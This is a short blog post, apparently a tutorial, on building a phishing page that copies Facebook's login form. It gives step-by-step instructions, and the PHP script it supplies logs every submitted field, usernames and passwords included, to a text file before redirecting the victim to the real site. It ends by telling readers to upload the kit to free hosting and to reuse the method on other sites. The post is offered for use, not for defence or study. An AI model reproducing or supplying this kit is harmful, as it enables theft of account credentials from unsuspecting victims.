Phishing Is a Fake Login Page Which Looks Like Real Page. It Is Designed By Hacker To Get Login Details From Victim.
How to Make a Phishing Page
1. Go
To Facebook.com, Right Click anywhere there and Click On “View Page Source”.
2. Copy
All the Source and Paste Whole Source in Notepad.
3. Search
for the Word “action” Better to Type Ctrl + F and Search for action.4. You Have To Find Text Which Look a Like:-
Action=https://www.facebook.com/login.php?login_attempt=1
5. Delete https://www.facebook.com/login.php?login_attempt=1 and Replace It withFacebook.php and Save It as Index.htm Not Index.html.
6. Now Open a New Notepad And Copy And Paste Given Coding In It and Save It as “Facebook.php”.
<?php
header("Location:
http://www.Facebook.com/ ");
$handle =
fopen("Passwords.txt", "a");
foreach($_POST as $variable =>
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
7. Now
Open a New Notepad And Save It as “Passwords.txt”.
8. You
Have Created a Phishing Page Now Just Go To Any Free Web Hosting Sit and Upload
Your Phishing Files In Public_html Folder With File Manager.
Similarly,
You Can Make Phishing Pages For Other Sites.




No comments:
Post a Comment